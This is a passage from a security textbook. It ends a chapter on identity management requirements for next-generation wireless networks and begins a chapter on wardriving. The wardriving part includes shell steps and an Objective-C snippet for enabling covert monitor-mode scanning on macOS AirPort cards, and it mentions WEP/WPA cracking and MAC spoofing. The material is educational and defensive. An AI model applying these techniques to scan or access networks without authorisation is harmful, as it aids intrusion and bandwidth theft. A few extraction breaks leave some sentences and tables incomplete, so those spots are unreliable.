• Single point of vulnerability: A feature that brings both advantages and disadvantages to IdM is the central system that is used. A central IdM system is used to avoid the vulnerabilities associated with competing or incompatible systems, as well as reducing the maintenance costs involved in running different types of systems. However, the flip side to this approach is that it represents a single point of vulnerability that, if compromised, can lead to the easy breach of all the data that the system is protecting. To counter this, IdM systems generally recommend that the additional resources that are saved by the organisation employing the IdM system are re-invested into providing more effective security measures. This will result in a system that is, overall, more secure than the existing mixture of systems that, individually, are not as secure.
• Migration from legacy systems and transition costs: IdM systems are generally at odds with existing systems that manage and secure users and resources. The concept of IdM systems involves the replacing of existing systems with a single IdM system. For larger organisations with staff and hardware that are selected based upon a preference for an existing system or systems, this represents a significant along with all the associated costs of replacing or retraining staff, introducing new equipment and the like. It will also increase the reluctance and reduce the enthusiasm of the organisation to adopt the new IdM system.
• Specific needs depending on the organisation: IdM systems generally need to be customised for each particular organisation that intends to use one. This is particularly true for the areas where an IdM system must support the business processes that an organisation has set up. These are usually unique to the organisation. Other areas that would require customisation from system to system include hardware requirements, the nature of the organisations' distributed systems, and so on.
• Extensive planning, designing, and implementation required: An IdM system must be extremely well planned, designed, and executed if it is to avoid the disadvantages that it is trying to overcome over existing approaches to enterprise management. Due to the all-encompassing and authoritative control that an IdM system will have over an organisation, it is important that any such system caters or close to the exact specifications outlined by the organisation. Otherwise, the system may be used incorrectly, resulting in the same inefficiencies as non-IdM systems.
• Relatively new concept, lack of uniform standard: IdM as a standardised concept and solution is yet to be finalised. This increases the likelihood of IdM systems still being in various stages of development and, more importantly, at different levels of effectiveness. This may lead to increased maintenance or upgrades in the near future, or lead to a flawed development and implementation for the early adopters of IdM systems. Both these alternatives result in an inefficient outcome compared to IdM's claims.

STANDARDS AND SOLUTIONS

A number of IdM technologies and standards have emerged for enterprise networks, government,



and Web services. The two main standard bodies to date are from the Liberty Alliance Project and the Web-Services (WS) Federation. However, the specifications produced by these organisations are mainly motivated by user profile management, single sign-on, and personalised services and do not address the requirements of NG wireless networks.

Relevant Standard Bodies

The standards organisations listed in Table 1 are involved in the development of standards for IdM.

Table 1.

Standards Organisation: Area of Standards / Example Standards
Organisation for Advancement of Structured Information Standards (OASIS): Private, worldwide organisation for XML standards. For example, Security Assertion Markup Language (SAML).
Web Services Interoperability (WS-I): "Open, industry organisation to promote Web service interoperability across operating systems and programming languages". For example, Simple Object Access Protocol (SOAP).
World Wide Web Consortium (W3C): Web Services Description Language (WSDL).
Internet Engineering Task Force (IETF): Loose collection of organisations with internet standards as the main point of interest. For example, Lightweight Directory Access Protocol (LDAP).
The Open Group: Sponsors sub groups, for example, Directory Interoperability Forum (DIF), Security Forum (SF).
International Organization for Standardization (ISO): Well known international standards network. For example, International Telecommunication Union-Telecommunication Standardization Sector (ITU-T).

IdM Standards

Directory Services

Directory services are considered a core part of any IdM system. The standards (with the standards body that created them) are:

• X.500 (ISO): Large global organisations/governmental organisations
• LDAP (IETF): Core standard for systems relying on directory management
• DSML (OASIS): Web-orientated extension of LDAP

Web Services

Web services support IdM systems across private and public networks. They are aimed, as such, to connect heterogeneous systems. Several well known protocols, such as TCP/IP, belong here. The ones that have specific applications in IdM are:

• SOAP (W3C, formerly Microsoft): For transporting XML messages/remote procedure calls
• WSDL (W3C): Used to express the programming interface and location of a service
• Universal Description, Discovery and Integration (UDDI): Used to find and publish services

Security

Security protocols are used for protecting information:

• SAML (OASIS): XML-based security solution for Web services
• Web Services Security (WSS) (Language): Enhancements to the SOAP protocol for security.

Federated Identity

Federated identity standards seek to standardise items that would make federated identities more feasible:


• Liberty Alliance Project: An organisation working mainly towards a solution/standard; they focus on the single sign on concept combined with federated identity.
• Microsoft .NET Passport: Primarily an organisational solution rather than a standard. This provides a Microsoft managed authentication service for other web services/corporations.

Workflow

Workflow standards include:

• Business Process Execution Language (BPEL): Allows business processes (tasks) to be described by a combination of Web services and internal message exchanges.

Provisioning

Provisioning standards are hinted at around workflow standards (which ensure a process is followed by provisioning), but are otherwise not well covered, with one exception:

• Service Provisioning Markup Language (SPML) (OASIS)

IdM IN NG WIRELESS NETWORKS

Motivation

IdM issues were not critical in traditional telecommunication networks, because networks, applications, and billing for different services were not integrated. For example, if a service provider offers telephone, Internet access, and cable TV then all of these services are treated separately. Each service has its own subscriber database containing subscriber records and identity information.

IdM, in both concept and practice, has provided an effective alternative and complement to the existing security measures in enterprise networks. The NG wireless networks can be seen as a collective of organisations in addition to their customers. Considering its integrated nature, an IdM framework for NG wireless networks brings organisations closer than in the current telecommunications environment.

IdM in NG wireless networks will be more complex than enterprise and Web service solutions. It involves consolidation, management and exchange of identity information of users to ensure the users have fast, reliable, and secure access to distributed network resources across multiple service providers. Furthermore, NG wireless networks have to provide seamless and ubiquitous support to various services in a heterogeneous environment.

Carefully planned and deployed, IdM solutions in NG wireless networks can prevent fraud, improve user experience, assist in the rapid deployment of new services, and provide better privacy and national security. Conversely, if it is not well planned and deployed, it can lead to identity theft, fraud, lack of privacy, and risk to national security. In Australia, the cost of identity theft alone was estimated to be from $1.1 billion during 2001-2002 according to some 2003 SIRCA Research.

The digital identity information in NG wireless networks will be more complex because it has to cater to a number of mobility scenarios, access networks, and services. User identity could include a combination of names, unique user identifiers, terminal identifiers, addresses, user credentials, SLA parameters, personal profiles, and so forth. The digital identity information has to be exchanged between various entities in the networks for the purpose of authentication, authorisation, personalised online configuration, access control, accountability, and so forth. IdM in NG wireless networks is expected to provide a mechanism for controlling multiple robust identities in an electronic world, which is a crucial issue in developing the next generation of distributed services (Buell & Sandhu, 2003).

Let us have a look at a typical access scenario in traditional networks (shown in Figure 1). In these networks, one organisation is often isolated from another since each organisation is running and providing its services independently. Each customer has a number of identity credentials and each credential can only be used to access services from one subscribed organisation.

An expected access scenario in NG wireless networks is illustrated in Figure 2. The NG wire-



Figure 1. Typical access scenario in traditional networks (diagram: the customer holds a separate key for each organisation; the access path to Organization A is established by authenticating one key and the access path to Organization B by authenticating another; Organization A is isolated from Organization B, and a key issued by one organisation is not allowed at the other)

less network subscriber is expected to use the same credential to access multiple organisations. Without a well designed IdM solution, it will not be possible to cater to the following: (1) accessing the subscribed organisations frequently, (2) increased frequency of handoff between multiple organisations in NG wireless networks, and (3) mutual authentication between subscriber and service provider, or between various service providers. A security breach on any component of the NG wireless networks will result in more severe consequences for all the other business partners. Therefore, in order to maintain a similar level of trust, reliability and profitability of the NG wireless networks, integrated IdM measures in NG wireless networks must be taken.

Benefits in NG Wireless Networks

A carefully researched IdM framework for NG wireless networks has a number of benefits for NG wireless network users, operators, and service providers.

1. User experience is often improved as users can ubiquitously access services and applications of their choice over a number of service providers without going through separate
2. Service delivery can be improved; for example, the time required to get new subscriber access is reduced.
3. It supports flexible user requirements and personalisation.
4. As with enterprise networks, there are numerous benefits such as reduction in the cost of new service launch, operation and maintenance (O&M) and increased return on investment (ROI) for NG wireless network operators and service providers.
5. IdM is expected to support distributed network architectures where entities communicate through open but secure interfaces.
6. It is necessary for seamless user mobility across networks and terminals.
7. A carefully researched and implemented IdM solution improves the security of the NG wireless networks and the user confidence in the use of the services.
8. IdM will assist in the efficient implementation of current and new legal and compliance initiatives about user data, behaviour and privacy.
9. IdM is expected to support number and service portability of users in an NG wireless network environment.
logins and avoiding the need to remember
multiple usernames and passwords or use However, introducing an IdM solution can bring
multiple tokens. new forms of security issues and threats. As you


Figure 2. Simple access scenarios in NG wireless networks (figure: the customer's single key gives access to both Organization A and Organization B; a trust relationship is established between A and B so as to allow resources to be shared)

consolidate the identity-related information, you create a new target for security attacks. But the advantage of implementing IdM is that you do not have to worry about protecting disparate solutions. Now you are able to consolidate your defences to one point.

Requirements for IdM in NG Wireless Networks

In this section, an analysis of the requirements for IdM in NG wireless networks is presented. The analysis will be undertaken from three perspectives: user, network, and service. The requirement analysis is expected to cater to the needs of end users, network operators, and service providers in terms of some of NG wireless networks’ key functional classifications such as operation, mobility, security, personalisation, and so forth. Before we get started, a definition of various terms used in NG wireless networks is given:

• User: A user refers to a person or entity with authorised access (The Health Insurance Portability and Accountability Act (HIPAA), 2005). In describing NG wireless networks, the term end user is often used to refer to a person or entity that uses network resources or services.
• User terminal: The user terminal is the device that is used by an end user to access the services provided by the NG wireless networks. It can be a mobile station (MS) or a laptop.
• Network operator: Network operator is defined as a legal entity that operates, deploys, and maintains network infrastructure. In NG wireless networks, the networks provided by network operator become the intermediary broker between services and subscribers.
• Service: Besides the traditional legacy services, like telephony voice and data, the NG wireless networks can also offer new value-added services to accommodate increasing multimedia demands, for example, video conferencing.
• Service provider: The services in NG wireless networks can be provided by different service providers using a single network platform or separate network platforms offered by a network operator.

End User Requirements

Unique Identity for User and Terminal

A unique universal identity will have to be assigned to each individual user of the NG wireless networks and to each user terminal that a user may use to access services of the NG wireless networks. Examples of such identity in Global System for Mobile Communications (GSM)/Universal Mobile Telecommunications System (UMTS) networks include the International Mobile Subscriber Identity (IMSI) and International Mobile Equipment Identity (IMEI). Users should have a single identity regardless of the access technology or network being used.


Figure 3. An overview of IdM requirements and NG wireless networks

The user identity must possess sufficient features that enable it to be used in a variety of end user terminals (computer, mobile phone, landline phone). Additionally, the unique identity may be required to be compatible across several IdM systems.

Storage of User Information

User identity information may be stored in many locations: user card, home network, visited network, service providers, and so forth. Sometimes, the stored user information can be used as a credential for fast authentication, for example, HTTP cookies are adopted to facilitate quick access to protected Web sites. However, such convenience can have a security risk as the security at the user end is more likely to be compromised. NG wireless networks designers have to carefully decide how much information needs to be securely stored at the user end. Any identity-related information stored at the user end has to be secure.

Exchange of User Identity

The unique identity allocated to a user should be treated confidentially. Sometimes, it is a risk to transmit the real identity of a user through radio or other public transmission mediums, like the Internet, or exchange it directly with unauthorised parties. Special measures must be taken to ensure that user identity is not disclosed during the exchanging process. One possibility to overcome this problem is to use a temporary user identity that is derived from the unique user identity and is valid for a fixed period of time. Once the validity of the temporary identifier is expired, a new temporary identity is generated. This way the real identity of a user is never compromised.

Self-Service

Self-service is the ability of a user to actively manage part of his or her records without requiring the intervention of help desk or support staff (Reed, 2002). This is an important requirement in all IdM systems. All NG wireless networks users should be able to securely manage some of their own identity information such as changing passwords, subscription status, choosing their mobility status, changing roaming authorisation, modifying user profiles, enabling location based services, and so forth. Users should also be able to modify content


filtering options for upstream and downstream traffic.

Users should be able to view their up-to-date billing records and service usage patterns. To increase trust, users should be able to view their self-service activity journal, which displays all the self-service activities performed by a user. An IdM system should be able to cater to situations where a user wants to delegate self-service privileges to another user such as maintaining accounts of family members.

Single Sign-On

An important user requirement of NG wireless networks is single sign-on. This means that once a user is authenticated, the user should have access to the entirety of their subscribed services without having to repeat the authentication process for each subscribed service.

Security and Privacy

To increase security, users should be able to choose end-to-end data encryption. Unauthorised users should not be allowed to access, view, or modify identity information.

With the growing awareness of privacy and the wish to protect it, users would be looking for more control over their privacy, in particular, what information is known about them and by whom. With an effective IdM system, a user should be able to exert some control as to how much identity data they want to release (which may consist of approval for sending some particular identity attributes) as well as being able to retrieve data concerning the location of their identity data and who is able to currently access it. Users should also be able to stay anonymous while accessing some network services such as network time protocol (NTP).

Access Network Selection

NG wireless networks users should be able to choose between access networks based on a number of factors such as bandwidth, quality of services, cost, location, and so forth. The user should be able to move between the different access technologies with minimum configuration change and get access consistently to their services according to their user profiles.

Mobility

Mobility across heterogeneous environments requires service adaptation for terminal mobility as well as personal mobility (France Telecom, 2002). In the event of service difficulty during mobility, users should receive user friendly notification with choices of actions to restore the service without the need to contact support staff.

Another related implication is that a user who is changing access networks during a session should be able to continue to access the same service without repeated authentication. For example, a mobile user should be continuously attached to a network when there is a handover from a UMTS network to a wireless LAN (WLAN).

Network Operator Requirements

In the NG wireless networks, the network operator will be responsible for maintaining and managing network infrastructure. In the ITU’s general reference model for NG networks (ITU-T, 2004), the network operator will be responsible for taking care of the management plane, control plane, and user plane in the transport layer.

Interface to Other Network Operators

Because of the mobility of users, it is difficult for a single network operator to cover a vast geographical area. Thus national and global roaming among multiple network operators is needed in NG wireless networks. In order to support roaming between NG wireless networks, identities of users and networks need to be authenticated before access to resources is granted through a visited network. It may be more cost effective for a roaming user to access services in the visited network than in the home network. A network operator should give choices to roaming users on the selection of services.


Interface to Trusted Third Party

It is possible that all of the IdM is performed by a third party that is different from the network operator or service provider. This third party will issue, authenticate, and control NG wireless networks user identities. A secure interface has to be provided between the NG wireless networks and the trusted third party.

Identity Requirements

The NG wireless networks operator should be able to maintain a unique identity for each user, terminal, network element, location area, and so forth, regardless of service and technologies used.

If the user is using faulty or dubious terminal equipment, it should be possible to bar services to the user.

The digital identity stored in a network should cater to various types of user identity information and data structures.

As in enterprise networks, proper implementation of account lifecycle management is required, that is, administrators should be able to manage the state of a user account for the complete span of that account. Even if an account is deleted or disabled, an audit history of the account should be maintained.

If necessary, the network operator should be able to remove the self-service privilege of some users.

The IdM system should support open standards in order to interact with multi-vendor terminals and network elements. It should be compatible with existing legacy systems and be able to adapt to emerging technologies, methods, and procedures.

Scalability and Performance

The IdM system should be able to store, retrieve, and exchange billions of identity records in a highly seamless, scalable, quick, and efficient manner to facilitate multiple real-time service requests from users.

It should achieve a high level of availability by incorporating fault-tolerant redundant system implementation. Furthermore, it should implement geographically distributed IdM servers in order to increase performance efficiency by load sharing and providing high availability. It should also maintain integrity and consistency of identity data across distributed identity information stores.

Figure 4. Network operator’s position in the NG wireless networks (figure labels: Service Network, Service Provider, Home Network, Operator A, Foreign Network, Operator B, Trusted Third Party; identities exchanging occurs at adjacent networks)

Mobility Management

NG wireless networks should be able to cater to the mobility requirements of users. This could include personal and/or terminal mobility, roaming, or nomadism. Mobility management may require a combination of identification, authentication, access control, location management, IP address allocation and management, user environment management, and user profile management functions. The network should cater for both foreign network IP address and home network IP address allocation schemes.

Security

Security requirements for NG wireless network operators should cover privacy, confidentiality, integrity, authenticity, non-repudiation, availability, intrusion detection, and maintenance of audit records as described later on.

Users and terminals should be reliably authenticated by the network operator using a nominated set of authentication credentials such as passwords, smart cards, biometrics, and other industry standard


methods. All the identity data should be kept in a very secure and scalable manner. Unauthorised access to identity data should be prevented.

Intrusion detection is required to detect and prevent security breaches with the network operator. This can also be done to minimise the fraudulent use of resources in a network.

Network administrators should be granted different levels of access according to their authority within the organisation. For accountability and security reasons, consistent and reliable audit records of administrative activities must be kept.

In order to apply user and data security such as confidentiality, integrity, and authenticity, the IdM system should securely store and exchange relevant encryption keys.

Billing

Up-to-date, accurate, and detailed billing information should be maintained by the network operator. When there is more than one source sending billing data, the network operator has to consolidate this information from various sources.

Furthermore, when a subscriber is roaming in a foreign network, charging records from that foreign network have to be authenticated to prevent fraudulent usage of services.

The network operator should be able to support a number of charging mechanisms such as charging based on usage, access networks, time, geographical area, and so forth. All of these different charging mechanisms should be compatible with the IdM system.

Service Provider Requirements

A user may require services from a number of service providers. In this scenario, the home operator and the service provider(s) should support secure access and exchange of user identity and billing information.

The identity of each user should be uniquely and reliably identified by a service provider. The service providers may have to rely on third party IdM providers where the user has already established an account.

The IdM and related systems should support open standards with a choice of technologies in order to interoperate with other entities.

Interface to Other Service Providers

Users may subscribe to the services offered by different service providers. Thus, the interoperability among service providers is important. User identity information may be exchanged between a group of service providers in order to improve the “transparent user experience.” This also requires trust to be established between these service providers.

Interface to Network Operator

A well-defined, open interface needs to be provided to the network operator at the service provider end. This would give the service provider the necessary authentication, authorization and accounting (AAA) to access network resources offered by the network operator.

Interface to Trusted Third Party

An interface to a trusted third party would give the service provider an opportunity to use external AAA services. By doing so, the complexity of implementation of services would be reduced. The authentication of users can be centralised.

Mobility Management

Some services require information about the current location and connectivity of subscribers. These are referred to as location-dependent or location-aware services. To provide such services to end users, a service provider must be able to access mobility-management-related information maintained by network operators. Subscribers have to consent to the release of this sensitive private information to service providers. Furthermore, when there are updates to location or mobility management data in the network operator, the updates have to be passed to the subscriber.


Security

As one of the main holders of identity data about subscribers, the service provider would have to exercise extra vigilance in ensuring that the data that they store is kept secure.

Additionally, in order to ensure a high degree of mobility and choice to the end user, this identity information must be able to be easily and securely transferred between different service providers depending on the end user’s current choice.

Billing

A number of requirements pertaining to billing for network operators are equally applicable to service providers. Billing records of the user should be dynamically generated according to the usage.

Regulatory Requirements

It is expected that the NG wireless networks should support open standards and choices among a number of technologies to promote competition and flexibility. Thus, any IdM solution that favours a particular standard or technology can be deemed anti-competitive.

Privacy is an important issue that has to be addressed directly by IdM products and solutions. There are increasing concerns about the fact that enterprises, e-commerce sites, governments, and third parties can access and correlate people’s identity information, sell this information, or misuse it. Current laws and legislation only partially address this problem. Despite the fact that many efforts have been made at the legislation level, there are still a lot of problems that have to be addressed. Furthermore, privacy laws can differ quite substantially depending on national and geographical aspects. All of the regulatory requirements pertaining to privacy and confidentiality of subscribers’ personal information should be built into the IdM solution in NG wireless networks.

Identity subjects have little control over the management of their identity information. It is very hard (if not impossible) for the subjects of identity information to define their own privacy policies (or delegate this task to trusted third parties), check for their enforcement, track in real-time the dissemination and usage of their personal information, be alerted when there are attempts to use or misuse it, and so forth. Because of emerging data protection laws, new legislation and the need of service providers to simplify the overall management, there is a tendency towards the delegation to users of the authoring of their identity profiles.

Figure 5. Service provider’s position in the NG wireless networks (figure labels: Service Network, Service Provider A, Service Provider B, Trusted Third Party, Transport Network, Network Operator, End User; identities exchanging occurs at adjacent networks)

Legal Requirements

Privacy and confidentiality of subscribers’ personal information and prevention of unauthorised access should be maintained at all times by network operators and service providers and any third party organisations involved in the NG wireless networks space.

If information has to be shared, subscribers should have a choice of the types of subscriber information that can be shared with various third parties. Reliable audit records of administrative and user activity should be kept, which could be retrieved and submitted to courts and other entities to meet legal requirements.

Legal interception of subscriber data should be possible. One of the new requirements for telecommunication network operators is to collect and pass on real-time transactions of target subscribers to law enforcement authorities (Council of Europe,


2001). Legal interception of subscriber data should be possible whichever network or service a subscriber is using.

References

Buell, D. A., & Sandhu, R. (2003). Identity management. IEEE Internet Computing, 7(6), 26-28.

Cisco Systems. (2005). Trust and identity management solutions. Retrieved 2005, from http://www.cisco.com/en/US/netsol/ns463/networking_solutions_package.html

Clercq, J. D., & Rouault, J. (2004, June). An introduction to identity management. Retrieved 2005, from http://devresource.hp.com/drc/resources/idmgt_intro/index.jsp

Council of Europe. (2001). ETS No. 185—Convention on cybercrime. Article 21, European Treaty Series (ETS). Retrieved 2005, from http://conventions.coe.int/Treaty/en/Treaties/Html/185.htm

Courion. (2005). Courion products overview: Enterprise provisioning. Retrieved 2005, from http://www.courion.com/products/benefits.asp?Node=SuiteOverview_Benefits

DIGITALIDWORLD. (2005). What is digital identity? Retrieved July 2005, from http://www.digitalidworld.com/local.php?op=view&file=aboutdid_detail

France Telecom. (2002). Inter-network mobility requirements considerations in NGN environments. Study Group 13—Delayed Contribution 322, Telecommunication Standardization Sector (WP 2/13). Retrieved 2004.

The Health Insurance Portability and Accountability Act (HIPAA). (2005). Glossary of HIPAA terms. Retrieved 2005, from http://hipaa.wustl.edu/Glossary.htm

International Telecommunication Union-Telecommunication Standardization Sector (ITU-T). (2004). NGN-related recommendations. Study Group 13 NGN-WD-87.

Locke, M., & McCarthy, M. (2002). Realising the business benefits of identity management. Fujitsu Services.

Pato, J., & Rouault, J. (2003, August). Identity management: The drive to federation. Retrieved 2006, from http://devresource.hp.com/drc/technical_white_papers/id_mgmt/index.jsp

Reed, A. (2002). The definitive guide to identity management (e-Book). Retrieved from http://www.rainbow.com/insights/ebooks.asp

Titterington, G. (2005, July). Identity management: Time for action. Ovum’s Research Store.

Key Terms

Access Control: Access control is used to determine what a user can or cannot do in a particular context.

Auditing and Reporting: Auditing and reporting involves the creation and keeping of records, whether for business reasons (e.g., customer transactions) or for providing a “trail” in the event that the system is compromised or found faulty.

Authentication: Authentication is the process by which an entity proves its identity to another party, for example, by showing photo ID to a bank teller or entering a password on a computer system.

Authorization: Authorisation is the process of granting access to a service or information based on a user’s role in an organisation.

Context: Context can refer to the type of transaction or organisation that the entity is identifying itself as, as well as the manner in which the transaction is made.

Digital Identity: Digital identity is the means that an entity can use to identify themselves in a digital world (i.e., data that can be transferred digitally, over a network, file, etc.).

Identity: The identity of an individual is the set of information known about that person.


Network Operator: Network operator is defined as a legal entity that operates, deploys, and maintains network infrastructure.

Profile: A profile consists of data needed to provide services to users once their identity has been verified.

User: A user refers to a person or entity with authorised access.

User Terminal: The user terminal is the device that is used by an end user to access the services provided by the NG wireless networks.



Chapter V
Wireless Wardriving
Luca Caviglione
Institute of Intelligent Systems for Automation (ISSIA)—Genoa Branch, Italian National Research
Council, Italy

Abstract

Wardriving is the practice of searching wireless networks while moving. Originally, it was explicitly
referred to as people searching for wireless signals by driving in vans, but nowadays it generally iden-
tifies people searching for wireless accesses while moving. Despite the legal aspects, t
connectivity” spawned a quite productive underground community, which developed powerful tools,
relying on cheap and standard hardware. The knowledge of these tools and techniques has many useful
aspects. Firstly, when designing the security framework of a wireless LAN (WLAN), the knowledge of
the vulnerabilities exploited at the basis of wardriving is a mandatory step, both to avoid penetration
issues and to detect whether attacks are ongoing. Secondly, hardware and software developers can design
better devices by avoiding common mistakes and using an effective suite for conducting security tests.
Lastly, people who are interested in gaining a deeper understanding of wireless standards can conduct
experiments by simply downloading software running on cost effective hardware. With such preamble,
in this chapter we will analyze the theory, the techniques, and the tools commonly used for wardriving
IEEE 802.11-based wireless networks.

The (Art of) Wardriving

Owing to the absence of physical barriers, the wireless medium, and consequently wireless LANs (WLANs), are accessible in a seamless manner. Thus, checking for the presence of some kind of wireless connectivity is quite a natural instinct; it is sufficient to enable the wireless interface and wait. This action is a very basic form of wardriving, a term originally coined by Shipley (2000) to refer to the activity of “driving around, looking for wireless networks.” This activity rapidly evolved, and nowadays it implies three basic steps: (1) finding a WLAN, (2) defining precisely its geographical coordinates by using GPS devices, and (3) publishing the location in specialized Web sites to enrich the wardriving community.

With the increasing diffusion of WLANs, especially those based on the cost effective IEEE 802.11 technologies, searching for wireless signals is a quite amusing and cheap activity. However, the IEEE 802.11 family originally relied (and still relies) on weak security mechanisms. In addition, many users unconsciously operate their wireless

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
Wireless Wardriving

networks without activating any confidentiality, integrity, and availability (CIA) mechanisms: opportunity makes the thief. Then, wardriving becomes a less noble hobby, since many wardrivers try also to gain access to the discovered networks; many of them are only interested in cracking the network, while a portion will steal someone else’s bandwidth. In this perspective, another basic step has been introduced: (4) trying to gain access to the WLAN.

It is also interesting that wardriving is becoming part of the urban culture. For instance, it spawned a strange fashion called warchalking, that is, the drawing of symbols in public places to advertise wireless networks, as defined by Matt Jones (as cited in Pollard, 2000).

Then, why is it important to know about wardriving?

Firstly, because you must become conscious that an active WLAN can trigger “recreational activities,” even if it is solely employed to share a printer. Secondly, the coordinated effort of many people highlighted several security flaws in the IEEE 802.11 standards and produced effective tools to test (well, actually, to compromise) the security of access points (APs). Thirdly, while performing their “raids,” wardrivers discovered flaws in the devices; consequently, this is valuable knowledge that could be used to avoid further errors. Lastly, trying to be a wardriver is an instructive activity that will help to better understand WLAN technologies, develop your own auditing tools and procedures, and prevent, or at least recognize, attacks.

Hardware and Software Requirements

In the basic form of searching for a WLAN, the act of wardriving could be simply performed by having a device equipped with an IEEE 802.11 air interface. Then, one can use a standard laptop, a wireless-capable console, or a handheld device. However, the typical gear consists of a laptop and a GPS device (even if not strictly necessary). Nevertheless, many wardrivers do prefer a Personal Computer Memory Card International Association (PCMCIA) wireless card that is capable of connecting with an external antenna to sense a wider area. With this basic setup you should be able to enable the wireless interface and start scanning the air. But, in order to conduct more sophisticated actions, a deeper understanding of aspects related to hardware and software should be gained. A detailed breakdown follows.

Wireless Interfaces

Each model of wireless interface differs in some way. Regardless of different power consumption, better antennas, and so on, two major aspects must be taken into account: the chipset and the availability of ad hoc drivers. The chipset roughly represents the soul of a wireless interface and it is mostly responsible for its capability. For instance, some chipsets do not allow assembling ad hoc frames, preventing particular attacks from being exploited. The reasons are different: the chipset could lack the logic to deal with raw packets or its specification is not known, discouraging tool developers from exploiting such functionalities. At the time of this writing, cards based on the Prism chipset are the most studied and documented, resulting in a variety of pre-made tools for preparing packets.1 Lastly, being the interfaces engineered for providing connectivity and not for such kind of tasks, manufacturers often change the internal chipset, even if maintaining the model or the brand name. This is why not all wireless cards are the same, and you should check their specifications carefully if you plan to use them for wardriving.

Device Drivers and Scanning

Device drivers provide the basic bridge between the user software and the hardware. Having a flexible device driver is mandatory to reach the soul of your interface. The best device drivers for wardriving are available for the aforementioned chipset, and for Unix systems. In addition, owing to its open source nature, Linux has the best available drivers.


Wireless Wardriving

The importance of drivers becomes evident when you scan the air for a network. Almost all of the bundled drivers do not allow performing the so-called passive scan. Passive scan implies that your interface operates in passive mode, often called radio frequency monitoring (rfmon) mode. While you operate in rfmon, you can scan APs and remain undetectable, since your card does not send any probe packets. Conversely, when acting in active mode, which is the standard configuration, as soon as you start looking for an AP, you will be revealed. The ability of switching from active to passive mode and vice versa is provided by the drivers. Many drivers do not provide this functionality, while others have it hidden, and it must be reverse engineered.

For the most popular chipsets, alternative drivers that allow the user to put the card in rfmon are available. If you plan to do undercover work, you should check the driver availability.

However, the active mode is faster than the passive mode. While operating in passive mode, the average time needed for scanning a channel is about 50 ms. Obviously, scanning multiple channels requires n · 50 ms. Conversely, when performing scanning operations in active mode, the needed time is lower. In fact, the operations required are: transmitting a probe request + waiting for a DCF IFS interval + transmitting a probe response. The overall time needed per channel is roughly equal to 0.45 ms. Again, scanning n channels increases the needed time accordingly (Ferro, 2005).

An Example of Driver Hacking

As said, the ability of enabling an air interface in rfmon could be available in the driver, but not documented. This is the case of the driver for the AirPort Extreme wireless adapters bundled with Mac OS X. This example is introduced for didactical purposes, stressing how a simple "hack" can transform a partially closed platform into an excellent wardriving configuration.

In a nutshell, OS X drivers are implemented via kernel extensions (kexts) that are similar to Linux's modules. Every kext is bundled with a kind of configuration file called Info.plist. The Info.plist is an XML file containing a dictionary that describes the properties of the kext it belongs to. The "hack" consists in a simple operation (i.e., changing a string) but it took time to discover.

Firstly, the proper Info.plist must be located. In a console type:

Mud:Luca$ cd /System/Library/Extensions/AppleAirPort.kext/Contents/

Hence, you can see the content of the kext upon simply typing:

Mud:Luca$ ls
Info.plist MacOS version.plist

Then, it is possible to modify the Info.plist:

Mud:Luca$ vim Info.plist

The key responsible for enabling rfmon follows (the relevant entry is the last one shown):

<key>IOKitPersonalities</key>
<dict>
    <key>Broadcom PCI</key>
    <dict>
        <key>APMonitorMode</key>
        <false/>

Switching the dictionary entry <false/> to <true/> enables rfmon on the AirPort Extreme card (editing a file under /System requires administrative privileges, and the kext must be reloaded for the new personality to take effect). However, such a task could be performed programmatically. This is the approach taken in KisMAC, which is popular among wardrivers. As an example, the Objective-C code snippet checking whether or not the wireless interface is in rfmon is depicted in Snippet 1.

Snippet 1. How to programmatically retrieve if an AirPort card is configured in rfmon (the numbered comments match the steps listed below)

// (1) read the raw Info.plist of the AirPort kext (the kext name depends on the
//     card generation: AppleAirPort.kext in the shell session above, AppleAirPort2.kext here)
NSData *fileData = [NSData dataWithContentsOfFile:
    @"/System/Library/Extensions/AppleAirPort2.kext/Contents/Info.plist"];

// (2) parse the XML property list into an (immutable) dictionary
NSDictionary *dict = [NSPropertyListSerialization propertyListFromData:fileData
    mutabilityOption:kCFPropertyListImmutable format:NULL errorDescription:nil];

// (3) walk IOKitPersonalities -> personality -> APMonitorMode and test the boolean
//     (the personality key must be spelled exactly as in your plist; the excerpt
//     above shows it as "Broadcom PCI")
if ([[dict valueForKeyPath:@"IOKitPersonalities.BroadcomPCI.APMonitorMode"] boolValue])
    return YES;
return NO;

Roughly, the steps presented in Snippet 1 allow the user to: (1) obtain a handle to the proper Info.plist file; (2) prepare a dictionary by parsing the Info.plist; and (3) check if the APMonitorMode key is <false/> or <true/>.

The Operating System and Other Matters

Needless to say, the operating system (OS) plays a role. For instance, when processing data for brute-forcing an encrypted flow, good symmetric multiprocessing (SMP) support is a must (as well as a good multi-threaded implementation). In addition, many APs can reject data from unrecognized MAC addresses: for this reason, having an OS that allows the user to change the MAC address of active interfaces is important. Lastly, many tools only run on *nix operating systems. However, the traffic collection phase can be decoupled from the processing, hence allowing the user to collect data on a machine and process it on another. As a consequence, simple devices (e.g., with low computational power) could be employed to collect data and discover APs (e.g., PDAs and portable gaming devices), while a standard PC could be used for processing the collected traffic.

XOR Arithmetic and CRC32 in a Nutshell

In order to understand the security mechanisms and the possible attacks, a short remark about eXclusive OR (XOR) arithmetic and the properties of the CRC32 function employed for data checking is presented. Basically, the XOR operator respects the properties presented in Table 1.

Table 1. Basic XOR arithmetic (⊕ represents the XOR operator)

Operation        Result
0 ⊕ 0            0
1 ⊕ 0            1
1 ⊕ 1            0
(A ⊕ B) ⊕ A      B
(A ⊕ B) ⊕ B      A

Concerning the CRC32, it is employed to check data and to assure integrity. It does not have the cryptographic strength of hash functions such as MD5 and SHA1 (Schneier, 1996). The CRC32 employed in the wired equivalent privacy (WEP) algorithm has two major properties, as presented in Table 2.

ABOUT THE SECURITY OF IEEE 802.11

The IEEE 802.11 security framework has changed over the years: from the flawed WEP to Wi-Fi Protected Access (WPA), introduced by the Wi-Fi Alliance in late 2002. Then, since mid-2004, the IEEE 802.11i Working Group (WG) introduced a framework based on 802.1X and the extensible authentication protocol (EAP), to bring wireless security to the next level; such effort is known as WPA2.

Even if highly criticized, the security mechanisms proposed by the different WGs have been developed with different operative contexts in mind. For instance, the WEP (as the name suggests) has been developed to prevent simple connection attempts, while WPA has been developed to offer adequate resistance to well-planned attacks. Currently, an average wardriver can: surely connect to an unprotected AP, spend 10 minutes to 1 hour to break the WEP, and crack a WPA-protected AP in some of its weak variants and well-suited circumstances. In order to understand the common techniques employed by wardrivers, the commonly adopted security countermeasures will be briefly explained.



